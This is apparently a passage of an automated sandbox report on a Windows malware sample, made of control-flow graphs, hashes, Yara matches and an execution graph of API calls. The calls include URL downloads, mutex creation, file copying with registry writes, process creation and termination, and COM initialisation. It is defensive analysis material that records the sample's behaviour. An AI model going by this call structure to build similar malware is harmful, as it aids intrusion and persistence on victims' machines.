                                                                                                    • Instruction Fuzzy Hash: EF112CBA9407647AC261F7B55C11EFF7FEC9F85701F0800AAFE8DD5280DA185A1493B1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 472 3931960-39319b8 474 39319cb-39319e3 472->474 475 39319ba-39319c6 call 395186a 472->475 478 39319f6-3931a0c 474->478 479 39319e5-39319f1 call 395186a 474->479 475->474 483 3931a1f-3931a3d 478->483 484 3931a0e-3931a1a call 395186a 478->484 479->478 487 3931a50-3931a82 call 3941584 call 394bdc0 483->487 488 3931a3f-3931a4b call 395186a 483->488 484->483 495 3931a95-3931ab8 call 3941602 call 394bdc0 487->495 496 3931a84-3931a90 call 395186a 487->496 488->487 502 3931aba 495->502 503 3931ae8-3931b17 call 3942ab0 495->503 496->495 504 3931ac0-3931ae6 call 3940e46 502->504 504->503
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 65388428-0
                                                                                                    • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                    • Instruction ID: b4885785c5e31080669c6a580df711f7d9908eef4983870bc28358cf214e2a20
                                                                                                    • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                    • Instruction Fuzzy Hash: EF515CB1D40209ABEB10EBA5DC85FEFBBBCFB44744F140025FA05F6190E7749A018BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 512 392f210-392f276 call 3936070 516 392f278-392f284 call 395186a 512->516 517 392f289-392f2a1 512->517 516->517 520 392f2a3-392f2af call 395186a 517->520 521 392f2b4-392f2d0 517->521 520->521 524 392f2d2-392f2de call 395186a 521->524 525 392f2e3-392f301 521->525 524->525 528 392f303-392f30f call 395186a 525->528 529 392f314-392f346 call 3941584 call 394bdc0 525->529 528->529 536 392f348-392f354 call 395186a 529->536 537 392f359-392f35b 529->537 536->537 539 392f360-392f363 537->539 540 392f3b0-392f3d1 call 3942ab0 539->540 541 392f365-392f37f call 3940e46 539->541 556 392f3d3-392f3db call 3942f27 540->556 557 392f3de-392f3f0 540->557 546 392f392-392f395 541->546 547 392f381-392f390 call 3934840 541->547 549 392f398-392f39d 546->549 547->539 549->549 552 392f39f-392f3ae call 3934840 549->552 552->539 556->557
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw$_memset_sprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 217217746-0
                                                                                                    • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                    • Instruction ID: 24eb9db27b638858c9d2c51b701a62093c1407ae4fdd49f4404705b58028d0a4
                                                                                                    • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                    • Instruction Fuzzy Hash: CF517DB5D40309AADF11DFA1DC46FEEBBBCFB45744F200069F902B6180E775AA058BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw$_memset_sprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 217217746-0
                                                                                                    • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                    • Instruction ID: fc8daa58519b75be54726f8905fb20215072d9ab1770a2da73775e1b4111446c
                                                                                                    • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                    • Instruction Fuzzy Hash: 3B515175D40219AADF11DFA1DC45FFFBBBCEB44744F240129F906B6180D674AA058BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __getptd_noexit.LIBCMT ref: 039E66DD
                                                                                                      • Part of subcall function 039459BF: __calloc_crt.LIBCMT ref: 039459E2
                                                                                                      • Part of subcall function 039459BF: __initptd.LIBCMT ref: 03945A04
                                                                                                    • __calloc_crt.LIBCMT ref: 039E6700
                                                                                                    • __get_sys_err_msg.LIBCMT ref: 039E671E
                                                                                                    • __invoke_watson.LIBCMT ref: 039E673B
                                                                                                    • __get_sys_err_msg.LIBCMT ref: 039E676D
                                                                                                    • __invoke_watson.LIBCMT ref: 039E678B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                                    • String ID:
                                                                                                    • API String ID: 4066021419-0
                                                                                                    • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                    • Instruction ID: 3a4ef10e25896b252b7c9d6a7af3ed60e79e2d5e4bab30ae312d89d0bcbeb910
                                                                                                    • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                    • Instruction Fuzzy Hash: 321194366017156BEB22FA699C40EAB739CDFA16A1F044466FD489A241F632DD0056D4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 1559183368-0
                                                                                                    • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                    • Instruction ID: 9817ca85987ffcf601b90111e1be0cc9f8cc6570bbfc76776843db8eabfd71d8
                                                                                                    • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                    • Instruction Fuzzy Hash: 0F51A430A003079BDB29CF698884E6EB7B9BF41365F188F69F8B5962D0D771D950CB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset
                                                                                                    • String ID: D
                                                                                                    • API String ID: 2102423945-2746444292
                                                                                                    • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                    • Instruction ID: 9aeb2acf02f8410b3b2ecd4463a2d2e897552c4638140ebce6ba9672f84a0164
                                                                                                    • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                    • Instruction Fuzzy Hash: 1AE16BB5D0021AABCF24DBA0CD89FEEB7B8BF05304F1444A9E549E6190EB74AA45CF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset
                                                                                                    • String ID: $$$(
                                                                                                    • API String ID: 2102423945-3551151888
                                                                                                    • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                    • Instruction ID: 09e0080fb004c4312078369fb5a34ce670e1b2dfcff12c0dd691cff68e797bff
                                                                                                    • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                    • Instruction Fuzzy Hash: 6091C175D00219DBEF20DFA4CC55BEEBBB8AF05304F5440A9E4157B2C0D7B65A48CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • std::exception::exception.LIBCMT ref: 0396FBF1
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0396FC06
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                                                    • String ID: TeM$TeM
                                                                                                    • API String ID: 3728558374-3870166017
                                                                                                    • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                    • Instruction ID: c2dc46d67b429460db25ba73754c865547333cb7c936063bfb7e7520121ca7f9
                                                                                                    • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                    • Instruction Fuzzy Hash: E3D06779C0030CBBCF00EFA5D459DDDBBB8AA44344B108466AD149B241EA74A3898B94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0394197D: __wfsopen.LIBCMT ref: 03941988
                                                                                                    • _fgetws.LIBCMT ref: 0392D15C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __wfsopen_fgetws
                                                                                                    • String ID:
                                                                                                    • API String ID: 853134316-0
                                                                                                    • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                    • Instruction ID: abeaf362755f705d20552bcfe75f24a61a92189c12466f9bdfd77cd171b7d462
                                                                                                    • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                    • Instruction Fuzzy Hash: 4291D675D00729DBCF20DFA4CC84BAEFBB8BF44344F180569E825A7244E775AA14CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Offset: 03920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3920000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc$__except_handler4_fprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1783060780-0
                                                                                                    • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                    • Instruction ID: b6c862c8b1a0f3ded825faa33cbd027dcc8f479efb64550dbedb1e4975fe1ffe
                                                                                                    • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                    • Instruction Fuzzy Hash: 6EA19DB4C00359EBEF11EFA4C849BDEBF75AF15304F540068E4057A291E7B65A88CBA6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:2.8%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:39.7%
                                                                                                    Total number of Nodes:753
                                                                                                    Total number of Limit Nodes:17
                                                                                                    execution_graph 31418 419f90 31419 419fa0 __write_nolock 31418->31419 31674 40cf10 31419->31674 31421 419fb0 31422 419fc4 GetCurrentProcess GetLastError SetPriorityClass 31421->31422 31423 419fb4 31421->31423 31425 419fe4 GetLastError 31422->31425 31426 419fe6 31422->31426 31898 4124e0 109 API calls _memset 31423->31898 31425->31426 31688 41d3c0 31426->31688 31428 419fb9 31430 41a022 31691 41d340 31430->31691 31431 41b669 31996 44f23e 59 API calls 2 library calls 31431->31996 31433 41b673 31997 44f23e 59 API calls 2 library calls 31433->31997 31438 41a065 31696 413a90 31438->31696 31442 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 31443 41a33d GlobalFree 31442->31443 31458 41a196 31442->31458 31444 41a354 31443->31444 31445 41a45c 31443->31445 31447 412220 76 API calls 31444->31447 31752 412220 31445->31752 31446 41a100 31446->31442 31449 41a359 31447->31449 31451 41a466 31449->31451 31767 40ef50 31449->31767 31450 41a1cc lstrcmpW lstrcmpW 31450->31458 31453 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 31453->31458 31454 41a48f 31457 41a4ef 31454->31457 31772 413ea0 31454->31772 31456 420235 60 API calls _LangCountryEnumProcEx@12 31456->31458 31459 411cd0 92 API calls 31457->31459 31458->31443 31458->31450 31458->31453 31458->31456 31460 41a361 31458->31460 31462 41a563 31459->31462 31712 423c92 31460->31712 31494 41a5db 31462->31494 31793 414690 31462->31793 31464 41a395 OpenProcess 31465 41a402 31464->31465 31466 41a3a9 WaitForSingleObject CloseHandle 31464->31466 31715 411cd0 31465->31715 31466->31465 31471 41a3cb 31466->31471 31467 41a6f9 31900 411a10 8 API calls 31467->31900 31486 41a3e2 GlobalFree 31471->31486 31487 41a3d4 Sleep 31471->31487 31899 411ab0 PeekMessageW DispatchMessageW PeekMessageW 31471->31899 31472 41a6fe 31476 41a8b6 CreateMutexA 31472->31476 31477 41a70f 31472->31477 31473 41a5a9 31474 414690 59 API calls 31473->31474 31479 41a5d4 31474->31479 31475 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 31480 41a451 31475->31480 31482 41a8ca 31476->31482 31481 41a7dc 31477->31481 31490 40ef50 58 API calls 31477->31490 31816 40d240 CoInitialize 31479->31816 31488 40ef50 58 API calls 31481->31488 31485 40ef50 58 API calls 31482->31485 31483 41a624 GetVersion 31483->31467 31489 41a632 lstrcpyW lstrcatW lstrcatW 31483->31489 31498 41a8da 31485->31498 31491 41a3f7 31486->31491 31487->31464 31492 41a7ec 31488->31492 31493 41a674 _memset 31489->31493 31500 41a72f 31490->31500 31495 41a7f1 lstrlenA 31492->31495 31497 41a6b4 ShellExecuteExW 31493->31497 31494->31467 31494->31472 31494->31476 31494->31483 31902 420c62 31495->31902 31497->31472 31505 41a6e3 31497->31505 31498->31498 31501 413ea0 59 API calls 31498->31501 31514 41a92f 31498->31514 31499 41a810 _memset 31502 41a81e MultiByteToWideChar lstrcatW 31499->31502 31500->31500 31503 413ea0 59 API calls 31500->31503 31508 41a780 31500->31508 31501->31498 31502->31495 31504 41a847 lstrlenW 31502->31504 31503->31500 31506 41a8a0 CreateMutexA 31504->31506 31507 41a856 31504->31507 31506->31482 31919 40e760 95 API calls 31507->31919 31510 41a792 31508->31510 31511 41a79c CreateThread 31508->31511 31901 413ff0 59 API calls __expandlocale 31510->31901 31511->31481 31516 41a7d0 31511->31516 31512 41a860 CreateThread WaitForSingleObject 31512->31506 31920 415c10 31514->31920 31516->31481 31517 41a98c 31935 412840 60 API calls 31517->31935 31519 41a997 31936 410fc0 93 API calls 4 library calls 31519->31936 31521 41a9ab 31522 41a9c2 lstrlenA 31521->31522 31522->31505 31523 41a9d8 31522->31523 31524 415c10 59 API calls 31523->31524 31525 41aa23 31524->31525 31937 412840 60 API calls 31525->31937 31527 41aa2e lstrcpyA 31529 41aa4b 31527->31529 31530 415c10 59 API calls 31529->31530 31531 41aa90 31530->31531 31532 40ef50 58 API calls 31531->31532 31533 41aaa0 31532->31533 31534 413ea0 59 API calls 31533->31534 31535 41aaf5 31533->31535 31534->31533 31938 413ff0 59 API calls __expandlocale 31535->31938 31537 41ab1d 31939 412900 31537->31939 31539 40ef50 58 API calls 31541 41abc5 31539->31541 31540 41ab28 _memmove 31540->31539 31542 413ea0 59 API calls 31541->31542 31543 41ac1e 31541->31543 31542->31541 31944 413ff0 59 API calls __expandlocale 31543->31944 31545 41ac46 31546 412900 60 API calls 31545->31546 31548 41ac51 _memmove 31546->31548 31547 40ef50 58 API calls 31549 41acee 31547->31549 31548->31547 31550 413ea0 59 API calls 31549->31550 31551 41ad43 31549->31551 31550->31549 31945 413ff0 59 API calls __expandlocale 31551->31945 31553 41ad6b 31554 412900 60 API calls 31553->31554 31555 41ad76 _memmove 31554->31555 31556 415c10 59 API calls 31555->31556 31557 41ae2a 31556->31557 31946 413580 59 API calls 31557->31946 31559 41ae3c 31560 415c10 59 API calls 31559->31560 31561 41ae76 31560->31561 31947 413580 59 API calls 31561->31947 31563 41ae82 31564 415c10 59 API calls 31563->31564 31565 41aebc 31564->31565 31948 413580 59 API calls 31565->31948 31567 41aec8 31568 415c10 59 API calls 31567->31568 31569 41af02 31568->31569 31949 413580 59 API calls 31569->31949 31571 41af0e 31572 415c10 59 API calls 31571->31572 31573 41af48 31572->31573 31950 413580 59 API calls 31573->31950 31575 41af54 31576 415c10 59 API calls 31575->31576 31577 41af8e 31576->31577 31951 413580 59 API calls 31577->31951 31579 41af9a 31580 415c10 59 API calls 31579->31580 31581 41afd4 31580->31581 31952 413580 59 API calls 31581->31952 31583 41afe0 31953 413100 59 API calls 31583->31953 31585 41b001 31954 413580 59 API calls 31585->31954 31587 41b025 31955 413100 59 API calls 31587->31955 31589 41b03c 31956 413580 59 API calls 31589->31956 31591 41b059 31957 413100 59 API calls 31591->31957 31593 41b070 31958 413580 59 API calls 31593->31958 31595 41b07c 31959 413100 59 API calls 31595->31959 31597 41b093 31960 413580 59 API calls 31597->31960 31599 41b09f 31961 413100 59 API calls 31599->31961 31601 41b0b6 31962 413580 59 API calls 31601->31962 31603 41b0c2 31963 413100 59 API calls 31603->31963 31605 41b0d9 31964 413580 59 API calls 31605->31964 31607 41b0e5 31965 413100 59 API calls 31607->31965 31609 41b0fc 31966 413580 59 API calls 31609->31966 31611 41b108 31613 41b130 31611->31613 31967 41cdd0 59 API calls 31611->31967 31614 40ef50 58 API calls 31613->31614 31615 41b16e 31614->31615 31617 41b1a5 GetUserNameW 31615->31617 31968 412de0 59 API calls 31615->31968 31618 41b1c9 31617->31618 31969 412c40 31618->31969 31620 41b1d8 31976 412bf0 59 API calls 31620->31976 31622 41b1ea 31977 40ecb0 60 API calls 2 library calls 31622->31977 31624 41b2f5 31980 4136c0 59 API calls 31624->31980 31626 41b308 31981 40ca70 59 API calls 31626->31981 31628 41b311 31982 4130b0 59 API calls 31628->31982 31630 41b322 31983 40c740 120 API calls 3 library calls 31630->31983 31631 412c40 59 API calls 31645 41b1f3 31631->31645 31633 412900 60 API calls 31633->31645 31634 41b327 31984 4111c0 169 API calls 2 library calls 31634->31984 31637 41b33b 31985 41ba10 LoadCursorW RegisterClassExW 31637->31985 31639 413100 59 API calls 31639->31645 31640 41b343 31986 41ba80 CreateWindowExW ShowWindow UpdateWindow 31640->31986 31642 41b34b 31646 41b34f 31642->31646 31987 410a50 65 API calls 31642->31987 31645->31624 31645->31631 31645->31633 31645->31639 31978 413580 59 API calls 31645->31978 31979 40f1f0 59 API calls 31645->31979 31646->31505 31647 41b379 31988 413100 59 API calls 31647->31988 31649 41b3a5 31989 413580 59 API calls 31649->31989 31651 41b48b 31995 41fdc0 CreateThread 31651->31995 31653 41b49f GetMessageW 31654 41b4ed 31653->31654 31655 41b4bf 31653->31655 31658 41b502 PostThreadMessageW 31654->31658 31659 41b55b 31654->31659 31656 41b4c5 TranslateMessage DispatchMessageW GetMessageW 31655->31656 31656->31654 31656->31656 31660 41b510 PeekMessageW 31658->31660 31661 41b564 PostThreadMessageW 31659->31661 31662 41b5bb 31659->31662 31664 41b546 WaitForSingleObject 31660->31664 31665 41b526 DispatchMessageW PeekMessageW 31660->31665 31663 41b570 PeekMessageW 31661->31663 31662->31646 31668 41b5d2 CloseHandle 31662->31668 31666 41b5a6 WaitForSingleObject 31663->31666 31667 41b586 DispatchMessageW PeekMessageW 31663->31667 31664->31659 31664->31660 31665->31664 31665->31665 31666->31662 31666->31663 31667->31666 31667->31667 31668->31646 31673 41b3b3 31673->31651 31990 41c330 59 API calls 31673->31990 31991 41c240 59 API calls 31673->31991 31992 41b8b0 59 API calls 31673->31992 31993 413260 59 API calls 31673->31993 31994 41fa10 CreateThread 31673->31994 31675 40cf32 _memset __write_nolock 31674->31675 31676 40cf4f InternetOpenW 31675->31676 31677 415c10 59 API calls 31676->31677 31678 40cf8a InternetOpenUrlW 31677->31678 31679 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 31678->31679 31681 40cfb2 31678->31681 31998 4156d0 31679->31998 31681->31421 31682 40d000 31683 4156d0 59 API calls 31682->31683 31684 40d049 31683->31684 31684->31681 32017 413010 59 API calls 31684->32017 31686 40d084 31686->31681 32018 413010 59 API calls 31686->32018 32023 41ccc0 31688->32023 32043 41cc50 31691->32043 31694 41a04d 31694->31433 31694->31438 31697 413ab2 31696->31697 31703 413ad0 GetModuleFileNameW PathRemoveFileSpecW 31696->31703 31698 413b00 31697->31698 31699 413aba 31697->31699 32051 44f23e 59 API calls 2 library calls 31698->32051 31700 423b4c 59 API calls 31699->31700 31702 413ac7 31700->31702 31702->31703 32052 44f1bb 59 API calls 3 library calls 31702->32052 31706 418400 31703->31706 31707 418437 31706->31707 31711 418446 31706->31711 31707->31711 32053 415d50 59 API calls __expandlocale 31707->32053 31708 4184b9 31708->31446 31711->31708 32054 418d50 59 API calls 31711->32054 32055 431781 31712->32055 32073 42f7c0 31715->32073 31718 411d20 _memset 31719 411d40 RegQueryValueExW RegCloseKey 31718->31719 31720 411d8f 31719->31720 31721 415c10 59 API calls 31720->31721 31722 411dbf 31721->31722 31723 411dd1 lstrlenA 31722->31723 31724 411e7c 31722->31724 32075 413520 59 API calls 31723->32075 31725 411e94 6 API calls 31724->31725 31728 411ef5 UuidCreate UuidToStringW 31725->31728 31727 411df1 31729 411e3c PathFileExistsW 31727->31729 31730 411e08 31727->31730 31731 411f36 31728->31731 31729->31724 31732 411e52 31729->31732 31730->31727 31730->31729 31731->31731 31734 415c10 59 API calls 31731->31734 31733 411e6a 31732->31733 31736 414690 59 API calls 31732->31736 31742 4121d1 31733->31742 31735 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 31734->31735 31737 411f98 31735->31737 31739 411fce 31735->31739 31736->31733 31738 415c10 59 API calls 31737->31738 31738->31739 31740 415c10 59 API calls 31739->31740 31741 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 31740->31741 31741->31742 31743 41207c _memset 31741->31743 31742->31475 31744 412095 6 API calls 31743->31744 31745 412115 _memset 31744->31745 31746 412109 31744->31746 31748 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 31745->31748 32076 413260 59 API calls 31746->32076 31749 4121b2 31748->31749 31750 4121aa GetLastError 31748->31750 31751 4121c0 WaitForSingleObject 31749->31751 31750->31742 31751->31742 31751->31751 31753 42f7c0 __write_nolock 31752->31753 31754 41222d 7 API calls 31753->31754 31755 4122bd K32EnumProcesses 31754->31755 31756 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 31754->31756 31757 4122d3 31755->31757 31758 4122df 31755->31758 31756->31755 31757->31449 31759 412353 31758->31759 31760 4122f0 OpenProcess 31758->31760 31759->31449 31761 412346 CloseHandle 31760->31761 31762 41230a K32EnumProcessModules 31760->31762 31761->31759 31761->31760 31762->31761 31763 41231c K32GetModuleBaseNameW 31762->31763 32077 420235 31763->32077 31765 41233e 31765->31761 31766 412345 31765->31766 31766->31761 31768 420c62 _malloc 58 API calls 31767->31768 31771 40ef6e _memset 31768->31771 31769 40efdc 31769->31454 31770 420c62 _malloc 58 API calls 31770->31771 31771->31769 31771->31770 31771->31771 31773 413f05 31772->31773 31777 413eae 31772->31777 31774 413fb1 31773->31774 31775 413f18 31773->31775 32093 44f23e 59 API calls 2 library calls 31774->32093 31778 413fbb 31775->31778 31779 413f2d 31775->31779 31788 413f3d __expandlocale 31775->31788 31777->31773 31784 413ed4 31777->31784 32094 44f23e 59 API calls 2 library calls 31778->32094 31779->31788 32092 416760 59 API calls 2 library calls 31779->32092 31786 413ed9 31784->31786 31787 413eef 31784->31787 32090 413da0 59 API calls __expandlocale 31786->32090 32091 413da0 59 API calls __expandlocale 31787->32091 31788->31454 31791 413eff 31791->31454 31792 413ee9 31792->31454 31794 4146a9 31793->31794 31795 41478c 31793->31795 31797 4146b6 31794->31797 31798 4146e9 31794->31798 32097 44f26c 59 API calls 3 library calls 31795->32097 31799 414796 31797->31799 31800 4146c2 31797->31800 31801 4147a0 31798->31801 31802 4146f5 31798->31802 32098 44f26c 59 API calls 3 library calls 31799->32098 32095 413340 59 API calls _memmove 31800->32095 32099 44f23e 59 API calls 2 library calls 31801->32099 31812 414707 __expandlocale 31802->31812 32096 416950 59 API calls 2 library calls 31802->32096 31811 4146e0 31811->31473 31812->31473 31817 40d27d CoInitializeSecurity 31816->31817 31823 40d276 31816->31823 31818 414690 59 API calls 31817->31818 31819 40d2b8 CoCreateInstance 31818->31819 31820 40d2e3 VariantInit VariantInit VariantInit VariantInit 31819->31820 31821 40da3c CoUninitialize 31819->31821 31822 40d38e VariantClear VariantClear VariantClear VariantClear 31820->31822 31821->31823 31824 40d3e2 31822->31824 31825 40d3cc CoUninitialize 31822->31825 31823->31494 32100 40b140 31824->32100 31825->31823 31828 40d3f6 32105 40b1d0 31828->32105 31830 40d422 31831 40d426 CoUninitialize 31830->31831 31832 40d43c 31830->31832 31831->31823 31833 40b140 60 API calls 31832->31833 31835 40d449 31833->31835 31836 40b1d0 SysFreeString 31835->31836 31837 40d471 31836->31837 31838 40d496 CoUninitialize 31837->31838 31839 40d4ac 31837->31839 31838->31823 31841 40d8cf 31839->31841 31842 40b140 60 API calls 31839->31842 31841->31821 31843 40d4d5 31842->31843 31844 40b1d0 SysFreeString 31843->31844 31845 40d4fd 31844->31845 31845->31841 31846 40b140 60 API calls 31845->31846 31847 40d5ae 31846->31847 31848 40b1d0 SysFreeString 31847->31848 31849 40d5d6 31848->31849 31849->31841 31850 40b140 60 API calls 31849->31850 31851 40d679 31850->31851 31852 40b1d0 SysFreeString 31851->31852 31853 40d6a1 31852->31853 31853->31841 31854 40b140 60 API calls 31853->31854 31855 40d6b6 31854->31855 31856 40b1d0 SysFreeString 31855->31856 31857 40d6de 31856->31857 31857->31841 31858 40b140 60 API calls 31857->31858 31859 40d707 31858->31859 31860 40b1d0 SysFreeString 31859->31860 31861 40d72f 31860->31861 31861->31841 31862 40b140 60 API calls 31861->31862 31863 40d744 31862->31863 31864 40b1d0 SysFreeString 31863->31864 31865 40d76c 31864->31865 31865->31841 32109 423aaf GetSystemTimeAsFileTime 31865->32109 31867 40d77d 32111 423551 31867->32111 31872 412c40 59 API calls 31873 40d7b5 31872->31873 31874 412900 60 API calls 31873->31874 31875 40d7c3 31874->31875 31876 40b140 60 API calls 31875->31876 31877 40d7db 31876->31877 31878 40b1d0 SysFreeString 31877->31878 31879 40d7ff 31878->31879 31879->31841 31880 40b140 60 API calls 31879->31880 31881 40d8a3 31880->31881 31882 40b1d0 SysFreeString 31881->31882 31883 40d8cb 31882->31883 31883->31841 31884 40b140 60 API calls 31883->31884 31885 40d8ea 31884->31885 31886 40b1d0 SysFreeString 31885->31886 31887 40d912 31886->31887 31887->31841 32119 40b400 SysAllocString 31887->32119 31889 40d936 VariantInit VariantInit 31890 40b140 60 API calls 31889->31890 31891 40d985 31890->31891 31892 40b1d0 SysFreeString 31891->31892 31893 40d9e7 VariantClear VariantClear VariantClear 31892->31893 31894 40da10 31893->31894 31895 40da46 CoUninitialize 31893->31895 32123 42052a 78 API calls 